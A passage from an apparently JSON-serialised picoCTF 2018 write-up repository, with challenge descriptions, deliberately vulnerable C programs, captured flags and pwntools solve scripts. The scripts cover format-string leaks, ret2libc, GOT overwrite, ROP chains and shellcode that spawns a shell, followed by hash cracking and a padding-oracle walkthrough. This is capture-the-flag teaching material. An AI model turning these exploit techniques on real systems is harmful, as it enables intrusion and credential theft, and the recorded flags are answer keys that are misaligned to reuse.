Admin if you are running this on the shell server.\\n\");\n exit(0);\n }\n \n fgets(flag, sizeof(flag), file);\n \n while(1) {\n printf(\"> \");\n fgets(buf, sizeof(buf), stdin);\n printf(buf);\n } \n return 0;\n}\n" }, { "path": "Binary Exploitation/echooo/solution/solve.py", "content": "#!/usr/bin/python\nfrom pwn import *\nimport re\n\nencFlag = ''\ns = remote('2018shell1.picoctf.com', 46960)\nstage1 = ' '.join(['%{}$x'.format(i) for i in range(27, 37)])\nprint s.recvuntil('>'), stage1\ns.sendline(stage1)\nflag1 = s.recvuntil('\\n').strip()\nlog.info('Flag Part 1: {}'.format(flag1))\n\nstage2 = ' '.join(['%{}$x'.format(i) for i in range(37, 42)])\nprint '>', stage2\ns.sendline(stage2)\nflag2 = s.recvuntil('\\n').replace('>', '').strip()\nlog.info('Flag Part 2: {}'.format(flag2))\n\nencFlag = flag1 + ' ' + flag2\n\nflag = ''\nfor i in encFlag.split(' '):\n\tflag += p32(int(i, 16))\n\nlog.success('Flag: ' + re.findall(r'(picoCTF\\{.+\\})', flag)[0])\n" }, { "path": "Binary Exploitation/got-2-learn-libc/README.md", "content": "# got-2-learn-libc\nPoints: 250\n\n## Category\nBinary Exploitation\n\n## Question\n>This program gives you the address of some system calls. Can you get a shell? You can find the [program](files/vuln) in /problems/got-2-learn-libc_3_6e9881e9ff61c814aafaf92921e88e33 on the shell server. [Source](files/vuln.c). \n\n### Hint\n>try returning to systems calls to leak information\n>\n>don't forget you can always return back to main().\n\n## Solution\nWorking solution [solve.py](solution/solve.py)\n\nThanks to [@LFlare](https://github.com/LFlare) for making the code compatible with ASLR\n\n### Flag\n`picoCTF{syc4al1s_4rE_uS3fUl_6319ec91}`\n" }, { "path": "Binary Exploitation/got-2-learn-libc/files/vuln.c", "content": "#include \n#include \n#include \n#include \n#include \n\n#define BUFSIZE 148\n#define FLAGSIZE 128\n\nchar useful_string[16] = \"/bin/sh\"; /* Maybe this can be used to spawn a shell? */\n\n\nvoid vuln(){\n char buf[BUFSIZE];\n puts(\"Enter a string:\");\n gets(buf);\n puts(buf);\n puts(\"Thanks! Exiting now...\");\n}\n\nint main(int argc, char **argv){\n\n setvbuf(stdout, NULL, _IONBF, 0);\n \n // Set the gid to the effective gid\n // this prevents /bin/sh from dropping the privileges\n gid_t gid = getegid();\n setresgid(gid, gid, gid);\n\n\n puts(\"Here are some useful addresses:\\n\");\n\n printf(\"puts: %p\\n\", puts);\n printf(\"fflush %p\\n\", fflush);\n printf(\"read: %p\\n\", read);\n printf(\"write: %p\\n\", write);\n printf(\"useful_string: %p\\n\", useful_string);\n\n printf(\"\\n\");\n \n vuln();\n\n \n return 0;\n}\n" }, { "path": "Binary Exploitation/got-2-learn-libc/solution/solve.py", "content": "#!/usr/bin/python\nfrom pwn import *\nimport os.path\n\nUSER = 'Platy' # Change username accordingly.\n\ns = ssh(host='2018shell1.picoctf.com', user=USER) # Make sure ssh-keyz challenge is done first\n\nif not os.path.isfile('./libc.so.6'):\n\ts.get('/lib32/libc.so.6')\n\n# Set contexts\ncontext(arch='i386', os='linux')\n\n# Load libraries\nlibc = ELF(\"./libc.so.6\")\n\nlibc_read_addr = libc.symbols['read']\nlibc_system_addr = libc.symbols['system']\nlibc_exit_addr = libc.symbols['exit']\n\npy = s.run(\"cd /problems/got-2-learn-libc_3_6e9881e9ff61c814aafaf92921e88e33; ./vuln\")\npy.recvuntil('\\n\\n')\n\npy.recvuntil(': ')\nputs_addr = int(py.readline(), 16)\n\npy.readuntil(' ')\nfflush_addr = int(py.readline(), 16)\n\npy.readuntil(': ')\nread_addr = int(py.readline(), 16)\n\npy.readuntil(': ')\nwrite_addr = int(py.readline(), 16)\n\npy.readuntil(': ')\nbinsh_addr = int(py.readline(), 16)\nlog.info(\"/bin/sh: {}\".format(hex(binsh_addr))) \n\n# Calculate offset\nlibc_offset = read_addr - libc_read_addr\n\n# Calculate libc offsets\nsystem_addr = libc_system_addr + libc_offset\nlog.info(\"SYSTEM: {}\".format(hex(system_addr))) \nexit_addr = libc_exit_addr + libc_offset\nlog.info(\"EXIT: {}\".format(hex(exit_addr)))\n\n# Build payload\npadding = \"A\" * 160\nexploit = padding + p32(system_addr) + p32(exit_addr) + p32(binsh_addr)\n\npy.sendline(exploit)\npy.sendline('echo; cat flag.txt; echo')\npy.interactive()\n\n# Close process\npy.close()\n" }, { "path": "Binary Exploitation/got-shell?/README.md", "content": "# got-shell?\nPoints: 350\n\n## Category\nBinary Exploitation\n\n## Question\n>Can you authenticate to this [service](files/auth) and get the flag? Connect to it with `nc 2018shell1.picoctf.com 54664`. [Source](files/auth.c)\n\n### Hint\n>Ever heard of the Global Offset Table?\n\n## Solution\nOverwrite the Global Offset Table to the address of the win function.\n\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{m4sT3r_0f_tH3_g0t_t4b1e_150b198c}`\n" }, { "path": "Binary Exploitation/got-shell?/files/auth.c", "content": "#include \n#include \n#include \n#include \n#include \n\nvoid win() {\n system(\"/bin/sh\");\n}\n\nint main(int argc, char **argv) {\n\n setvbuf(stdout, NULL, _IONBF, 0);\n\n char buf[256];\n \n unsigned int address;\n unsigned int value;\n\n puts(\"I'll let you write one 4 byte value to memory. Where would you like to write this 4 byte value?\");\n\n scanf(\"%x\", &address);\n\n sprintf(buf, \"Okay, now what value would you like to write to 0x%x\", address);\n puts(buf);\n \n scanf(\"%x\", &value);\n\n sprintf(buf, \"Okay, writing 0x%x to 0x%x\", value, address);\n puts(buf);\n\n *(unsigned int *)address = value;\n\n puts(\"Okay, exiting now...\\n\");\n exit(1);\n \n}\n" }, { "path": "Binary Exploitation/got-shell?/solution/solve.py", "content": "#!/usr/bin/python\nfrom pwn import *\nfrom time import sleep\n\nauth = ELF('./auth')\ngot = str(hex(auth.got['exit']))\nwin_func = str(hex(auth.symbols['win']))\n\nlog.info('Global Offset: {}'.format(got))\nlog.info('Win Function: {}'.format(win_func))\n\ns = remote('2018shell1.picoctf.com', 54664)\nprint s.recv()\nprint got\ns.sendline(got)\nsleep(1)\nprint s.recv()\n\ns.sendline(win_func)\ns.sendline('cat flag.txt')\ns.interactive()\ns.close()\n" }, { "path": "Binary Exploitation/gps/README.md", "content": "# gps\nPoints: 550\n\n## Category\nBinary Exploitation\n\n## Question\n>You got really lost in the wilderness, with nothing but your trusty [gps](files/gps). Can you find your way back to a shell and get the flag? Connect with `nc 2018shell1.picoctf.com 21755`. ([Source](files/gps.c)). \n\n### Hint\n>Can you make your shellcode randomization-resistant?\n\n## Solution\nUnsolved.\n\n### Flag\n`flag`\n" }, { "path": "Binary Exploitation/gps/files/gps.c", "content": "#include \n#include \n#include \n#include \n\n#define GPS_ACCURACY 1337\n\ntypedef void (fn_t)(void);\n\nvoid initialize() {\n printf(\"GPS Initializing\");\n for (int i = 0; i < 10; ++i) {\n usleep(300000);\n printf(\".\");\n }\n printf(\"Done\\n\");\n}\n\nvoid acquire_satellites() {\n printf(\"Acquiring satellites.\");\n for (int i = 0; i < 3; ++i) {\n printf(\"Satellite %d\", i);\n for (int j = 0; j < rand() % 10; ++j) {\n usleep(133700);\n printf(\".\");\n }\n if (i != 3) {\n printf(\"Done\\n\");\n } else {\n printf(\"Weak signal.\\n\");\n }\n }\n\n printf(\"\\nGPS Initialized.\\n\");\n printf(\"Warning: Weak signal causing low measurement accuracy\\n\\n\");\n}\n\nvoid *query_position() {\n char stk;\n int offset = rand() % GPS_ACCURACY - (GPS_ACCURACY / 2);\n void *ret = &stk + offset;\n return ret;\n}\n\n\nint main() {\n setbuf(stdout, NULL);\n\n char buffer[0x1000];\n srand((unsigned) (uintptr_t) buffer);\n\n initialize();\n acquire_satellites();\n\n printf(\"We need to access flag.txt.\\nCurrent position: %p\\n\", query_position());\n\n printf(\"What's your plan?\\n> \");\n fgets(buffer, sizeof(buffer), stdin);\n\n fn_t *location;\n\n printf(\"Where do we start?\\n> \");\n scanf(\"%p\", (void**) &location);\n\n location();\n return 0;\n}\n" }, { "path": "Binary Exploitation/leak-me/README.md", "content": "# leak-me\nPoints: 200\n\n## Category\nBinary Exploitation\n\n## Question\n>Can you authenticate to this [service](files/auth) and get the flag? Connect with `nc 2018shell1.picoctf.com 31045`. [Source](files/auth.c). \n\n### Hint\n>Are all the system calls being used safely?\n>\n>Some people can have reallllllly long names you know..\n\n## Solution\nBy spamming the service with multiple characters, the password from _password.txt_ gets leaked.\n\n```\n$ python -c \"print 'A' * 300\" | nc 2018shell1.picoctf.com 31045\nWhat is your name?\nHello AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,a_reAllY_s3cuRe_p4s$word_d98e8d\n\nIncorrect Password!\n```\n\nNow we can enter in a name and the password obtained.\n\n```\n$ nc 2018shell1.picoctf.com 31045\nWhat is your name?\nPlaty\nHello Platy,\nPlease Enter the Password.\na_reAllY_s3cuRe_p4s$word_d98e8d\npicoCTF{aLw4y5_Ch3cK_tHe_bUfF3r_s1z3_d1667872}\n```\n\nWorking solution [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{aLw4y5_Ch3cK_tHe_bUfF3r_s1z3_d1667872}`\n" }, { "path": "Binary Exploitation/leak-me/files/auth.c", "content": "#include \n#include \n#include \n#include \n#include \n\nint flag() {\n char flag[48];\n FILE *file;\n file = fopen(\"flag.txt\", \"r\");\n if (file == NULL) {\n printf(\"Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\\n\");\n exit(0);\n }\n\n fgets(flag, sizeof(flag), file);\n printf(\"%s\", flag);\n return 0;\n}\n\n\nint main(int argc, char **argv){\n\n setvbuf(stdout, NULL, _IONBF, 0);\n \n // Set the gid to the effective gid\n gid_t gid = getegid();\n setresgid(gid, gid, gid);\n \n // real pw: \n FILE *file;\n char password[64];\n char name[256];\n char password_input[64];\n \n memset(password, 0, sizeof(password));\n memset(name, 0, sizeof(name));\n memset(password_input, 0, sizeof(password_input));\n \n printf(\"What is your name?\\n\");\n \n fgets(name, sizeof(name), stdin);\n char *end = strchr(name, '\\n');\n if (end != NULL) {\n *end = '\\x00';\n }\n\n strcat(name, \",\\nPlease Enter the Password.\");\n\n file = fopen(\"password.txt\", \"r\");\n if (file == NULL) {\n printf(\"Password File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\\n\");\n exit(0);\n }\n\n fgets(password, sizeof(password), file);\n\n printf(\"Hello \");\n puts(name);\n\n fgets(password_input, sizeof(password_input), stdin);\n password_input[sizeof(password_input)] = '\\x00';\n \n if (!strcmp(password_input, password)) {\n flag();\n }\n else {\n printf(\"Incorrect Password!\\n\");\n }\n return 0;\n}\n" }, { "path": "Binary Exploitation/leak-me/solution/solve.py", "content": "from pwn import *\nimport re\nimport time\n\ns = remote('2018shell1.picoctf.com', 31045)\nprint s.recv()\ns.sendline('A' * 500)\n\ntime.sleep(0.5)\n\npwd = s.recv()\nprint pwd\npwd = re.findall(r'A+,(.+)', pwd)[0].strip()\ns.close()\n\ns = remote('2018shell1.picoctf.com', 31045)\nprint s.recv()\ns.sendline('Platy')\nprint s.recv()\ns.sendline(pwd)\ntime.sleep(0.5)\nprint s.recv()\n\ns.close()\n" }, { "path": "Binary Exploitation/rop chain/README.md", "content": "# rop chain\nPoints: 350\n\n## Category\nBinary Exploitation\n\n## Question\n>Can you exploit the following [program](files/rop) and get the flag? You can findi the program in /problems/rop-chain_0_6cdbecac1c3aa2316425c7d44e6ddf9d on the shell server? [Source](files/rop.c). \n\n### Hint\n>Try and call the functions in the correct order!\n>\n>Remember, you can always call main() again!\n\n## Solution\nFirst we analyse the steps required to get the flag. It looks like we have to go to the _flag_ function to get the flag. But a few criterias must be met first. _win1_, _win2_ and _arg_check2_ must be set to the correct values to print the flag. There is _win_function1_ and _win_function2_ which will allow us to set these values.\n\nAt the vuln function, it calls gets, which is known for it's issues with buffer overflow exploits. We use the De Brujin sequence and calculate the offset needed. In this case, it's 28 characters.\n\nNow, we get the addresses of both win functions and the flag function.\n\n```asm\n[0x080484d0]> s @ sym.win_function1\n0x80485cb\n[0x080484d0]> s @ sym.win_function2\n0x80485d8\n[0x080484d0]> s @ sym.flag\n0x804862b\n```\n\nSince _win_function2_ and _flag_ functions both required arguments, we need a ROP gadget that pops and returns. Popping allows us to insert our own arguments inside. Then the addresses of the next function can be written, so when the program runs return, it jumps to our desired function.\n\nTo get such a gadget, we can use radare2.\n\n```asm\n[0x080484d0]> /R pop; ret;\n...\n...\n0x08048804 c408 les ecx, [eax]\n0x08048806 5b pop ebx\n0x08048807 c3 ret\n```\n\nWe can select _0x08048806_ as our address. It does not matter which register the value from the stack is popped to.\n\nNow we just chain the address and get the flag.\n`exploit = padding + win1_addr + win2_addr + pop_ret_gadget + arg_check1 + flag_addr + pop_ret_gadget + arg_check2`\n\nWorking solution [solve.py](solution/solve.py)\n\nRecommended reads: http://codearcana.com/posts/2013/05/28/introduction-to-return-oriented-programming-rop.html#fn-7\n\n### Flag\n`picoCTF{rOp_aInT_5o_h4Rd_R1gHt_536d67d1}`\n" }, { "path": "Binary Exploitation/rop chain/files/exp", "content": "AAAAAAAAAAAAAAAAAAAAAAAAAAAA˅\u0004\b؅\u0004\b\u0006\u0004\b+\u0004\b\u0006\u0004\b\n" }, { "path": "Binary Exploitation/rop chain/files/flag.txt", "content": "DID IT!\n" }, { "path": "Binary Exploitation/rop chain/files/rop.c", "content": "#include \n#include \n#include \n#include \n#include \n#include \n\n#define BUFSIZE 16\n\nbool win1 = false;\nbool win2 = false;\n\n\nvoid win_function1() {\n win1 = true;\n}\n\nvoid win_function2(unsigned int arg_check1) {\n if (win1 && arg_check1 == 0xBAAAAAAD) {\n win2 = true;\n }\n else if (win1) {\n printf(\"Wrong Argument. Try Again.\\n\");\n }\n else {\n printf(\"Nope. Try a little bit harder.\\n\");\n }\n}\n\nvoid flag(unsigned int arg_check2) {\n char flag[48];\n FILE *file;\n file = fopen(\"flag.txt\", \"r\");\n if (file == NULL) {\n printf(\"Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\\n\");\n exit(0);\n }\n\n fgets(flag, sizeof(flag), file);\n \n if (win1 && win2 && arg_check2 == 0xDEADBAAD) {\n printf(\"%s\", flag);\n return;\n }\n else if (win1 && win2) {\n printf(\"Incorrect Argument. Remember, you can call other functions in between each win function!\\n\");\n }\n else if (win1 || win2) {\n printf(\"Nice Try! You're Getting There!\\n\");\n }\n else {\n printf(\"You won't get the flag that easy..\\n\");\n }\n}\n\nvoid vuln() {\n char buf[16];\n printf(\"Enter your input> \");\n return gets(buf);\n}\n\nint main(int argc, char **argv){\n\n setvbuf(stdout, NULL, _IONBF, 0);\n \n // Set the gid to the effective gid\n // this prevents /bin/sh from dropping the privileges\n gid_t gid = getegid();\n setresgid(gid, gid, gid);\n vuln();\n}\n" }, { "path": "Binary Exploitation/rop chain/solution/solve.py", "content": "#!/usr/bin/python\nfrom pwn import *\n\nUSER = 'Platy' # Change username accordingly.\n\npadding = 'A' * 28\n\nwin1_addr = p32(0x80485cb)\nwin2_addr = p32(0x80485d8)\nflag_addr = p32(0x804862b)\n\npop_ret_gadget = p32(0x08048806)\n\narg_check1 = p32(0xBAAAAAAD)\narg_check2 = p32(0xDEADBAAD)\n\nexploit = padding + win1_addr + win2_addr + pop_ret_gadget + arg_check1 + flag_addr + pop_ret_gadget + arg_check2\n\ns = ssh(host='2018shell1.picoctf.com', user=USER) # Make sure ssh-keyz challenge is done first\npy = s.run('cd /problems/rop-chain_0_6cdbecac1c3aa2316425c7d44e6ddf9d; ./rop')\nprint py.recv()\npy.sendline(exploit)\nprint py.recv()\n" }, { "path": "Binary Exploitation/shellcode/README.md", "content": "# shellcode\nPoints: 200\n\n## Category\nBinary Exploitation\n\n## Question\n>This [program](files/vuln) executes any input you give it. Can you get a shell? You can find the program in /problems/shellcode_0_48532ce5a1829a772b64e4da6fa58eed on the shell server. [Source](files/vuln.c). \n\n### Hint\n>Maybe try writing some shellcode?\n>\n>You also might be able to find some good shellcode online.\n\n## Solution\nRun [solve.py](solution/solve.py)\n\n### Flag\n`picoCTF{shellc0de_w00h00_9ee0edd0}`\n" }, { "path": "Binary Exploitation/shellcode/files/exploit", "content": "1Ph//shh/bin°\u000b̀1@̀,\n" }, { "path": "Binary Exploitation/shellcode/files/vuln.c", "content": "#include \n#include \n#include \n#include \n#include \n\n#define BUFSIZE 148\n#define FLAGSIZE 128\n\nvoid vuln(char *buf){\n gets(buf);\n puts(buf);\n}\n\nint main(int argc, char **argv){\n\n setvbuf(stdout, NULL, _IONBF, 0);\n \n // Set the gid to the effective gid\n // this prevents /bin/sh from dropping the privileges\n gid_t gid = getegid();\n setresgid(gid, gid, gid);\n\n char buf[BUFSIZE];\n\n puts(\"Enter a string!\");\n vuln(buf);\n\n puts(\"Thanks! Executing now...\");\n \n ((void (*)())buf)();\n \n return 0;\n}\n" }, { "path": "Binary Exploitation/shellcode/solution/solve.py", "content": "#!/usr/bin/python\n\nfrom pwn import *\n\nPADDING = 164\n\npayload = asm(shellcraft.sh())\nnopsled = '\\x90' * (PADDING - len(payload))\nstackAddr = p32(0xffffd22c)\n\nexploit = nopsled + payload + stackAddr\n\ns = ssh(host='2018shell1.picoctf.com', user='Platy')\n\npy = s.run('cd /problems/shellcode_0_48532ce5a1829a772b64e4da6fa58eed; ./vuln')\nprint py.recv()\npy.sendline(exploit)\npy.sendline('cat flag.txt')\npy.interactive()\ns.close()\n" }, { "path": "Cryptography/Crypto Warmup 1/README.md", "content": "# Crypto Warmup 1\nPoints: 75\n\n## Category\nCryptography\n\n## Question\n>Crpyto can often be done by hand, here's a message you got from a friend, `llkjmlmpadkkc` with the key of `thisisalilkey`. Can you use this [table](files/table.txt) to solve it?. \n\n### Hint\n>Submit your answer in our competition's flag format. For example, if you answer was 'hello', you would submit 'picoCTF{HELLO}' as the flag.\n>\n>Please use all caps for the message.\n\n## Solution\nThis uses a Vigenère Cipher. Online tool: https://planetcalc.com/2468/\n\n1. Set Transformation to _Decrypt_\n2. Set Key to _thisisalilkey_\n3. Set Text to _llkjmlmpadkkc_\n4. Click _CALCULATE_\n\nTransformed text is _secretmessage_\n\n### Flag\n`picoCTF{SECRETMESSAGE}`\n" }, { "path": "Cryptography/Crypto Warmup 1/files/table.txt", "content": " A B C D E F G H I J K L M N O P Q R S T U V W X Y Z \n +----------------------------------------------------\nA | A B C D E F G H I J K L M N O P Q R S T U V W X Y Z\nB | B C D E F G H I J K L M N O P Q R S T U V W X Y Z A\nC | C D E F G H I J K L M N O P Q R S T U V W X Y Z A B\nD | D E F G H I J K L M N O P Q R S T U V W X Y Z A B C\nE | E F G H I J K L M N O P Q R S T U V W X Y Z A B C D\nF | F G H I J K L M N O P Q R S T U V W X Y Z A B C D E\nG | G H I J K L M N O P Q R S T U V W X Y Z A B C D E F\nH | H I J K L M N O P Q R S T U V W X Y Z A B C D E F G\nI | I J K L M N O P Q R S T U V W X Y Z A B C D E F G H\nJ | J K L M N O P Q R S T U V W X Y Z A B C D E F G H I\nK | K L M N O P Q R S T U V W X Y Z A B C D E F G H I J\nL | L M N O P Q R S T U V W X Y Z A B C D E F G H I J K\nM | M N O P Q R S T U V W X Y Z A B C D E F G H I J K L\nN | N O P Q R S T U V W X Y Z A B C D E F G H I J K L M\nO | O P Q R S T U V W X Y Z A B C D E F G H I J K L M N\nP | P Q R S T U V W X Y Z A B C D E F G H I J K L M N O\nQ | Q R S T U V W X Y Z A B C D E F G H I J K L M N O P\nR | R S T U V W X Y Z A B C D E F G H I J K L M N O P Q\nS | S T U V W X Y Z A B C D E F G H I J K L M N O P Q R\nT | T U V W X Y Z A B C D E F G H I J K L M N O P Q R S\nU | U V W X Y Z A B C D E F G H I J K L M N O P Q R S T\nV | V W X Y Z A B C D E F G H I J K L M N O P Q R S T U\nW | W X Y Z A B C D E F G H I J K L M N O P Q R S T U V\nX | X Y Z A B C D E F G H I J K L M N O P Q R S T U V W\nY | Y Z A B C D E F G H I J K L M N O P Q R S T U V W X\nZ | Z A B C D E F G H I J K L M N O P Q R S T U V W X Y\n\n" }, { "path": "Cryptography/Crypto Warmup 2/README.md", "content": "# Crypto Warmup 2\nPoints: 75\n\n## Category\nCryptography\n\n## Question\n>Cryptography doesn't have to be complicated, have you ever heard of something called rot13? `cvpbPGS{guvf_vf_pelcgb!}`\n\n### Hint\n>This can be solved online if you don't want to do it by hand!\n\n## Solution\nThis uses a ROT13 Cipher. Online tool: https://www.rot13.com/\n\nSet input to _cvpbPGS{guvf_vf_pelcgb!}_\n\nOutput will be _picoCTF{this_is_crypto!}_ \n\n### Flag\n`picoCTF{this_is_crypto!}`\n" }, { "path": "Cryptography/HEEEEEEERE'S Johnny!/README.md", "content": "# HEEEEEEERE'S Johnny!\nPoints: 100\n\n## Category\nCryptography\n\n## Question\n>Okay, so we found some important looking files on a linux computer. Maybe they can be used to get a password to the process. Connect with `nc 2018shell1.picoctf.com 5221`. Files can be found here: [passwd](files/passwd) [shadow](files/shadow). \n\n### Hint\n>If at first you don't succeed, try, try again. And again. And again.\n>\n>If you're not careful these kind of problems can really \"rockyou\".\n\n## Solution\nDo `john --wordlist=rockyou.txt shadow`\n\nThe file _rockyou.txt_ can be found from _/usr/share/wordlists/rockyou.txt.gz_.\n\nExtract the file by doing `gzip -d rockyou.txt.gz`\n\nConnect to service and enter in credentials to get the flag.\n\n```\n$ nc 2018shell1.picoctf.com 5221\nUsername: root\nPassword: thematrix\npicoCTF{J0hn_1$_R1pp3d_289677b5}\n```\n\n### Flag\n`picoCTF{J0hn_1$_R1pp3d_289677b5}`\n" }, { "path": "Cryptography/HEEEEEEERE'S Johnny!/files/passwd", "content": "root:x:0:0:root:/root:/bin/bash" }, { "path": "Cryptography/HEEEEEEERE'S Johnny!/files/shadow", "content": "root:$6$LcvKHioa$67O1HA8Ti.KHeNbD4rE79ZMl1RbiCw4V7eM.r6AURp2wGnapUpXC.VdVB4WGoS2J5eVKP/1MFeMmXIdveJeOS0:17695:0:99999:7:::\n" }, { "path": "Cryptography/James Brahm Returns/README.md", "content": "# James Brahm Returns\nPoints: 700\n\n## Category\nCryptography\n\n## Question\n>Dr. Xernon has finally approved an update to James Brahm's spy terminal. (Someone finally told them that ECB isn't secure.) Fortunately, CBC mode is safe! Right? Connect with `nc 2018shell1.picoctf.com 15608`. [Source](files/source.py). \n\n### Hint\n>What killed SSL3?\n\n## Solution\nUnsolved.\n\n### Flag\n`flag`\n" }, { "path": "Cryptography/James Brahm Returns/files/source.py", "content": "#!/usr/bin/python2 -u\nfrom Crypto.Cipher import AES\nimport reuse\nimport random\nfrom string import digits\nimport hashlib\n\nagent_code = \"\"\"flag\"\"\"\nkey = \"\"\"key\"\"\"\n\n\ndef pad(message):\n if len(message) % 16 == 0:\n message = message + chr(16)*16\n elif len(message) % 16 != 0:\n message = message + chr(16 - len(message)%16)*(16 - len(message)%16)\n return message\n\ndef encrypt(key, plain, IV):\n cipher = AES.new( key.decode('hex'), AES.MODE_CBC, IV.decode('hex') )\n return IV + cipher.encrypt(plain).encode('hex')\n\ndef decrypt(key, ciphertext, iv):\n cipher = AES.new(key.decode('hex'), AES.MODE_CBC, iv.decode('hex'))\n return cipher.decrypt(ciphertext.decode('hex')).encode('hex')\n\ndef verify_mac(message):\n h = hashlib.sha1() \n mac = message[-40:].decode('hex')\n message = message[:-40].decode('hex')\n h.update(message)\n if h.digest() == mac:\n return True\n return False\n \ndef check_padding(message):\n check_char = ord(message[-2:].decode('hex'))\n if (check_char < 17) and (check_char > 0): #bud\n return message[:-check_char*2]\n else:\n return False\n\nwelcome = \"Welcome, Agent 006!\"\nprint welcome\noptions = \"\"\"Select an option:\nEncrypt message (E)\nSend & verify (S)\n\"\"\"\nwhile True:\n encrypt_or_send = raw_input(options)\n if \"e\" in encrypt_or_send.lower():\n \n sitrep = raw_input(\"Please enter your situation report: \")\n message = \"\"\"Agent,\nGreetings. My situation report is as follows:\n{0}\nMy agent identifying code is: {1}.\nDown with the Soviets,\n006\n\"\"\".format( sitrep, agent_code )\n PS = raw_input(\"Anything else? \")\n h = hashlib.sha1()\n message = message+PS\n h.update(message)\n message = pad(message+ h.digest())\n\n IV = ''.join(random.choice(digits + 'abcdef') for _ in range(32))\n print \"encrypted: {}\".format(encrypt(key, message, IV ))\n elif \"s\" in encrypt_or_send.lower():\n sitrep = raw_input(\"Please input the encrypted message: \")\n iv = sitrep[:32]\n c = sitrep[32:]\n if reuse.check(iv):\n message = decrypt(key, c, iv)\n message = check_padding(message)\n if message:\n if verify_mac(message):\n print(\"Successful decryption.\")\n else:\n print(\"Ooops! Did not decrypt successfully. Please send again.\")\n else:\n print(\"Ooops! Did not decrypt successfully. Please send again.\")\n else:\n print(\"Cannot reuse IVs!\")\n \n \n \n\n" }, { "path": "Cryptography/Magic Padding Oracle/README.md", "content": "# Magic Padding Oracle\nPoints: 450\n\n## Category\nCryptography\n\n## Question\n>Can you help us retreive the flag from this crypto service? Connect with `nc 2018shell1.picoctf.com 27533`. We were able to recover some [Source](files/pkcs7.py) Code. \n\n### Hint\n>Paddding Oracle [Attack](https://blog.skullsecurity.org/2013/padding-oracle-attacks-in-depth)\n\n## Solution\nWe have to submit the encrypted JSON string with the `\"is_admin\"` property set to a string called `\"true\"` and the `\"expires\"` property changed to a date later than the date the string was submitted. Also take note that the date string has to adhere to the following format: `%Y-%m-%d`. The `\"username\"` property has to be present but can be of any value.\n\nThis JSON string: `{\"username\": \"cafebabe!\",\"is_admin\": \"true\",\"expires\": \"2020-1-1\"}` was accepted.\nThe encrypted JSON string is: `bab23fa6e34b02b1b4279bf85d89e03e4d8fc9cc9dee572b7c40c9c710f27426437ce07b7d4356c9a97dff9840209d50c9b18d4547f557437fe70d5c62f66283590c5cdaf042515720b8879e43de91e4cafebabecafebabecafebabecafebabe`\n\nIn order to encrypt it without the key, we can use the padding oracle attack to make a decryption oracle. This decryption oracle is able to take in a ciphertext block and output the corresponding decrypted ciphertext block.\n\nWe are able to do this by submitting 2 ciphertext blocks. The first is the IV, which we will use to brute force the decrypted ciphertext block, and the second is the actual ciphertext block.\n\nWe try all bytes (`0x00` to `0xff`) on the last byte of the IV until we get a valid padding response (in this case, the server would respond with an error from `json.loads()` because what was being submitted is not a valid JSON string).\n\nBecause we know the padding bytes (`0x01`, `0x02 0x02`, ... `0x0f 0x0f ... 0x0f`, `0x10 0x10 ... 0x10`), we can continue with the 2nd last byte all the way until the first byte to figure out what the decrypted ciphertext is.\n\nBy using the decryption oracle, we can encrypt the JSON string by working from the back of the plaintext string (properly padded, split into 16 byte blocks) by setting the last ciphertext block as an arbitrary 16 byte ciphertext block (I used `0xcafebabecafebabecafebabecafebabe`).\n\nThen by XOR-ing the decrypted ciphertext block and the last 16 bytes of the plaintext, we can get the previous ciphertext block. We repeatedly can do this all the way from the back until we get to the first ciphertext block (the IV).\n\nThen we concatenate the IV and all the ciphertext blocks and submit it to the server, which will decrypt into the JSON string and return the flag.\n\n#### Note\n\nFor some reason the communication with the server is really slow. I am not sure whether it is a limitation of the nclib library, but as a result each 16 byte block takes ~1 hour to decrypt.\n\nHence encrypting the entire JSON string takes around -4 hours because it's 4 blocks long.\n\n### Flag\n`picoCTF{0r4cl3s_c4n_l34k_c644af03}`\n" }, { "path": "Cryptography/Magic Padding Oracle/files/pkcs7.py", "content": "#!/usr/bin/python2\nimport os\nimport json\nimport sys\nimport time\n\nfrom Crypto.Cipher import AES\n\ncookiefile = open(\"cookie\", \"r\").read().strip()\nflag = open(\"flag\", \"r\").read().strip()\nkey = open(\"key\", \"r\").read().strip()\n\nwelcome = \"\"\"\nWelcome to Secure Encryption Service version 1.63\n\"\"\"\ndef pad(s):\n return s + (16 - len(s) % 16) * chr(16 - len(s) % 16)\n\ndef isvalidpad(s):\n return ord(s[-1])*s[-1:]==s[-ord(s[-1]):]\n\ndef unpad(s):\n return s[:-ord(s[len(s)-1:])]\n\ndef encrypt(m):\n IV=\"This is an IV456\"\n cipher = AES.new(key.decode('hex'), AES.MODE_CBC, IV)\n return IV.encode(\"hex\")+cipher.encrypt(pad(m)).encode(\"hex\")\n\ndef decrypt(m):\n cipher = AES.new(key.decode('hex'), AES.MODE_CBC, m[0:32].decode(\"hex\"))\n return cipher.decrypt(m[32:].decode(\"hex\"))\n \n\n# flush output immediately\nsys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0)\nprint welcome\nprint \"Here is a sample cookie: \" + encrypt(cookiefile)\n\n# Get their cookie\nprint \"What is your cookie?\"\ncookie2 = sys.stdin.readline()\n# decrypt, but remove the trailing newline first\ncookie2decoded = decrypt(cookie2[:-1])\n\nif isvalidpad(cookie2decoded):\n d=json.loads(unpad(cookie2decoded))\n print \"username: \" + d[\"username\"]\n print \"Admin? \" + d[\"is_admin\"]\n exptime=time.strptime(d[\"expires\"],\"%Y-%m-%d\")\n if exptime > time.localtime():\n print \"Cookie is not expired\"\n else:\n print \"Cookie is expired\"\n if d[\"is_admin\"]==\"true\" and exptime > time.localtime():\n print \"The flag is: \" + flag\nelse:\n print \"invalid padding\"\n" }, { "path": "Cryptography/Magic Padding Oracle/solution/requirements.txt", "content": "nclib" }, { "path": "Cryptography/Magic Padding Oracle/solution/solution.py", "content": "import nclib, sys, binascii\n\n# Generate all 256 